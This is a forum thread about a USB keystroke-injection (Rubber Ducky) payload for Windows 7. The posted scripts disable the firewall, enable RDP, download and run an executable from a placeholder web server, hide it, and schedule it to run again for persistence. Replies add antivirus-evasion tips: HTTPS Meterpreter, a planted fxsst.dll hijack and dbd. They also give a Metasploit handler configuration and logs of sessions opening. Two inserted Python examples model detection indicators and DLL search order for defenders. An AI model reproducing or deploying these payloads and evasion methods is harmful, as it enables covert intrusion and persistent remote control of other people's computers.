TeCHemically Posted August 30, 2013 (edited)

This is a simple modification to the PowerShell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D

******************************************************************************************************************************
DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
STRING exit
ENTER
******************************************************************************************************************************

You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload, simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above.
Then in terminal type the following 2 commands:

cd /usr/share/ducky/encoder
(for Kali; if using a different OS, cd to the directory your "encoder.jar" file is in)

java -jar encoder.jar -i payload.txt -o inject.bin
(now place the "inject.bin" file on your ducky and use as you normally would)
TeCHemically Posted September 4, 2013 (edited)

OK, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case the connection is lost. If this task has already been run in the past, it will replace the scheduled task with the name "Management".

DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
DELAY 300
STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"
ENTER
DELAY 300
STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2
ENTER
DELAY 300
STRING y
ENTER
STRING exit
ENTER
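Added example, not code from the posts above or from simple-ducky/encoder.jar: a small replayer for the Ducky Script dialect used in this thread (DELAY, STRING, ENTER, single keys such as MENU, and modifier chords such as ALT Y). It reconstructs the command lines that would reach the cmd window and then flags the host-side artifacts each command leaves, which is what a defender would hunt for after a payload like this runs. SAMPLE is a constructed excerpt of the posted payload: the Start Menu / UAC keystrokes are omitted and <server_name> is left as the placeholder it is in the post.

```python
"""Replay a Ducky Script into typed command lines and flag the host artifacts they leave.
Added example; SAMPLE is a constructed excerpt of the payload posted in this thread."""
import re
from dataclasses import dataclass, field

# Keys the encoder accepts on their own or as chord members; enough for this payload.
KEYS = {"ENTER", "ESCAPE", "ESC", "MENU", "APP", "TAB", "SPACE", "DELETE",
        "UP", "DOWN", "LEFT", "RIGHT", "GUI", "WINDOWS", "CONTROL", "CTRL", "ALT", "SHIFT"}


@dataclass
class Replay:
    total_delay_ms: int = 0
    typed_lines: list = field(default_factory=list)   # lines submitted with ENTER
    chords: list = field(default_factory=list)        # key presses that are not text
    pending: str = ""                                 # STRING text not yet ENTERed


def replay(script: str) -> Replay:
    """Walk the script line by line, accumulating STRING text until ENTER submits it."""
    r = Replay()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            r.total_delay_ms += int(arg)
        elif cmd == "STRING":
            r.pending += arg
        elif cmd == "ENTER":
            r.typed_lines.append(r.pending)
            r.pending = ""
        elif all(t in KEYS or len(t) == 1 for t in line.split()):
            r.chords.append(line)          # e.g. CONTROL ESCAPE, ALT Y, MENU
        else:
            raise ValueError(f"unknown Ducky Script line: {line!r}")
    return r


# Host artifacts each typed command creates; a defender can look for exactly these.
IOC_RULES = [
    ("firewall disabled",          r"^netsh\s+firewall\s+set\s+opmode\s+disable\b"),
    ("RDP enabled via registry",   r"\bfDenyTSConnections\b.*\s/d\s+0\b"),
    ("Remote Assistance enabled",  r"\bfAllowToGetHelp\b.*\s/d\s+1\b"),
    ("download to Startup folder", r"DownloadFile\(.*\\Startup\\"),
    ("hidden+system attributes",   r"^attrib\b(?=.*\+H)(?=.*\+S)"),
    ("scheduled task created",     r"^schtasks\s+/create\b"),
]


def audit(script: str) -> list:
    """Return (rule name, 1-based command index, command) for every rule that fires."""
    hits = []
    for idx, cmd in enumerate(replay(script).typed_lines, start=1):
        for name, pattern in IOC_RULES:
            if re.search(pattern, cmd, re.IGNORECASE):
                hits.append((name, idx, cmd))
    return hits


SAMPLE = r"""
REM constructed excerpt: the cmd stage of the posted payload, after the UAC prompt
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe')
ENTER
DELAY 300
STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe"
ENTER
DELAY 300
STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe" /sc hourly /mo 2
ENTER
DELAY 300
STRING y
ENTER
STRING exit
ENTER
"""

if __name__ == "__main__":
    result = replay(SAMPLE)
    print(f"{len(result.typed_lines)} commands typed, {result.total_delay_ms} ms of DELAY")
    for name, idx, cmd in audit(SAMPLE):
        print(f"  command {idx}: {name}: {cmd[:60]}")
```

Running it over the excerpt reports eight typed commands and one finding per artifact (firewall, the two Terminal Server values, the Startup-folder drop, the +H +S attributes, the "Management" task). The same rules can be pointed at the real host: each one corresponds to a registry value, a file attribute or a task that survives after the cmd window closes, which is the sense in which the persistence is loud on the host as well as on the network.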
Forgiven Posted September 26, 2013

Does your version minimize the terminal upon execution and then close the terminal when it's done?
Xcellerator Posted September 26, 2013

This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound RDP connections at the firewall level.
TeCHemically Posted September 27, 2013

> This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound RDP connections at the firewall level.

Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connection being so noticeable? I try to make sure my listener is on a common port so it can get through the network firewall, and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thanks again!
Xcellerator Posted September 27, 2013

Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in Metasploit. The 64-bit HTTPS Meterpreter, even as a binary, will pretty much never be detected by an AV. As far as persistence goes, the Startup folder is one way, but is usually picked up by AV. Or put Meterpreter into a DLL file, call it "fxsst.dll" and throw it into C:\Windows. Windows automatically tries to load this DLL on startup as part of the "Windows Picture and Fax" service.
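Added example, not code from Xcellerator's post: a model of the DLL search order that the fxsst.dll trick relies on. A process whose own directory is searched before System32 can be made to load a planted copy of a DLL that legitimately lives in System32; the same model also shows the two cases where the trick does not work (a DLL on the KnownDLLs list, which the loader always maps from System32, and an application directory the attacker cannot write to) and the case where it works even better (a DLL the process asks for but that exists nowhere, so any writable directory on the search path will do). HOST is constructed sample data: which directories hold which files, which are writable for the attacker's token, and the KnownDLLs list. It is not a scan of a real machine, and PATH is left out of the order.

```python
"""DLL search-order model for the fxsst.dll persistence trick described above.
Added example; HOST is constructed sample data, not a real host."""
from dataclasses import dataclass

SYSTEM32 = r"c:\windows\system32"


@dataclass(frozen=True)
class Host:
    files: dict       # directory -> set of lowercase file names present there
    writable: set     # directories the attacker's token can write to
    known_dlls: set   # HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs


def search_order(app_dir: str, cwd: str, safe_search: bool = True) -> list:
    """Search order with SafeDllSearchMode on: application directory, System32,
    System (16-bit), Windows, then the current directory (PATH omitted here).
    With SafeDllSearchMode off, the current directory moves to second place."""
    order = [app_dir, SYSTEM32, r"c:\windows\system", r"c:\windows"]
    order.insert(1 if not safe_search else len(order), cwd)
    seen, out = set(), []
    for d in order:                    # keep only the first occurrence of a directory
        d = d.lower()
        if d not in seen:
            seen.add(d)
            out.append(d)
    return out


def resolve(dll: str, app_dir: str, cwd: str, host: Host, safe_search: bool = True):
    """Directory the loader would take `dll` from, or None if it is not found at all."""
    dll = dll.lower()
    if dll in host.known_dlls:         # KnownDLLs bypass the search entirely
        return SYSTEM32 if dll in host.files.get(SYSTEM32, set()) else None
    for d in search_order(app_dir, cwd, safe_search):
        if dll in host.files.get(d, set()):
            return d
    return None


def hijack_points(dll: str, app_dir: str, cwd: str, host: Host, safe_search: bool = True) -> list:
    """Writable directories searched before the legitimate copy of `dll`. If the DLL
    exists nowhere (the 'phantom DLL' case) every writable searched directory counts.
    A KnownDLL cannot be hijacked through the search order, so the list is empty."""
    dll = dll.lower()
    if dll in host.known_dlls:
        return []
    points = []
    for d in search_order(app_dir, cwd, safe_search):
        if dll in host.files.get(d, set()):
            break                      # legitimate copy found; later dirs never searched
        if d in host.writable:
            points.append(d)
    return points


# Constructed Win7-like layout; the attacker holds an admin token (after the UAC bypass),
# so C:\Windows, the directory explorer.exe runs from, is writable.
HOST = Host(
    files={
        r"c:\windows": {"explorer.exe", "notepad.exe"},
        SYSTEM32: {"kernel32.dll", "user32.dll", "fxsst.dll"},
        r"c:\users\bob\downloads": set(),
    },
    writable={r"c:\windows", r"c:\users\bob\downloads"},
    known_dlls={"kernel32.dll", "user32.dll"},
)

if __name__ == "__main__":
    app_dir, cwd = r"c:\windows", r"c:\users\bob\downloads"
    for dll in ("fxsst.dll", "kernel32.dll", "missing.dll"):
        print(dll, "->", resolve(dll, app_dir, cwd, HOST), hijack_points(dll, app_dir, cwd, HOST))
```

With the sample host, fxsst.dll resolves to System32 but C:\Windows is listed as a hijack point because it is searched first and is writable; kernel32.dll yields no hijack point because it is a KnownDLL; and a DLL that exists nowhere lists every writable directory on the path. Turning SafeDllSearchMode off adds the current directory as a second hijack point, which is why that setting matters when reviewing a host.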
TeCHemically Posted September 30, 2013

> Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in Metasploit. The 64-bit HTTPS Meterpreter, even as a binary, will pretty much never be detected by an AV. As far as persistence goes, the Startup folder is one way, but is usually picked up by AV. Or put Meterpreter into a DLL file, call it "fxsst.dll" and throw it into C:\Windows. Windows automatically tries to load this DLL on startup as part of the "Windows Picture and Fax" service.

Thanks for the help! :) Can the 64-bit HTTPS Meterpreter shell run on a 32-bit machine? Also, I generated the above mentioned DLL via msfconsole, but the command I used just allowed me to specify https. Is this created 64-bit by default, or is there a part of the command I missed that will create the 64-bit shell? Thanks again, this is a great method!
TeCHemically Posted September 30, 2013

> Does your version minimize the terminal upon execution and then close the terminal when it's done?

No, but that section could be easily added to the top. Good idea :)
Xcellerator Posted October 1, 2013

You can't run a 64-bit executable on a 32-bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but the x86 detection rate is A LOT higher than 64-bit.)

The x86 Meterpreter reverse_https is here: payload/windows/meterpreter/reverse_https (the one I expect you used)

The x64 one is here: payload/windows/x64/meterpreter/reverse_https

Also, try and use msfvenom for generating payloads; it's a combination of msfpayload and msfencode.
TeCHemically Posted October 1, 2013

> You can't run a 64-bit executable on a 32-bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but the x86 detection rate is A LOT higher than 64-bit.) The x86 Meterpreter reverse_https is here: payload/windows/meterpreter/reverse_https (the one I expect you used). The x64 one is here: payload/windows/x64/meterpreter/reverse_https. Also, try and use msfvenom for generating payloads; it's a combination of msfpayload and msfencode.

You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D
TeCHemically Posted October 1, 2013

So to start the handler would I use the following:

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 443
set PAYLOAD windows/windows/x64/meterpreter/reverse_https
set ExitOnSession false
exploit -j
Xcellerator Posted October 1, 2013

Correct, except only one "windows" on the 4th line:

set PAYLOAD windows/x64/meterpreter/reverse_https

Keep in mind that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious; best to pick something that will blend in with the other network traffic, at least as far as ports are concerned.)
TeCHemically Posted October 2, 2013

> Correct, except only one "windows" on the 4th line: set PAYLOAD windows/x64/meterpreter/reverse_https. Keep in mind that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious; best to pick something that will blend in with the other network traffic, at least as far as ports are concerned.)

Great, thanks so much! :D
TeCHemically Posted October 2, 2013

> You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D

I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned DLL, but I don't see the options I need in the help of msfvenom.
skysploit Posted October 3, 2013

Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

~skysploit
TeCHemically Posted October 3, 2013

> Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit

Beautiful, great work man! I just watched your vid. You have yourself another subscriber.
TeCHemically Posted October 3, 2013

> Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit

So, I have to ask, since you have "I remember" playing on that vid: do you recognize my avatar?
Xcellerator Posted October 3, 2013

If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.
TeCHemically Posted October 4, 2013

> If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.

I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe / exe template that I can use for AV evasion? I have a thread on this started under Security; if you could shed some light that would be amazing. Thanks for all your help! :)
TeCHemically Posted October 4, 2013 (edited)

> Correct, except only one "windows" on the 4th line: set PAYLOAD windows/x64/meterpreter/reverse_https. Keep in mind that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious; best to pick something that will blend in with the other network traffic, at least as far as ports are concerned.)

I started the 32-bit listener and created the fxsst.dll with a 32-bit reverse_https payload. When it runs I get the following on my listening machine:

Starting the payload handler...
[*] <IP address>:5465 Request received for /JuQL...
[*] <IP address>:5465 Staging connection for target /JuQL received...
[*] Patched user-agent at offset 657384...
[*] Patched transport at offset 657044...
[*] Patched URL at offset 657112...
[*] Patched Expiration Timeout at offset 657868...
[*] Patched Communication Timeout at offset 657984...
[*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500
[-] Failed to load extension: No response was received to the core_loadlib request.
TeCHemically Posted October 4, 2013

Tried it again and I get the following. It is acting like the shell is there, but I cannot interact at all. In fact the shell is acting like it is on the perimeter, not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp?

exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Starting the payload handler...
[*] <Public IP address>:60476 Request received for /JuQL...
[*] <Public IP address>:60476 Staging connection for target /JuQL received...
[*] Patched user-agent at offset 657384...
[*] Patched transport at offset 657044...
[*] Patched URL at offset 657112...
[*] Patched Expiration Timeout at offset 657868...
[*] Patched Communication Timeout at offset 657984...
[*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500
TeCHemically Posted October 5, 2013

> Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit

WOW, just... WOW man... the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D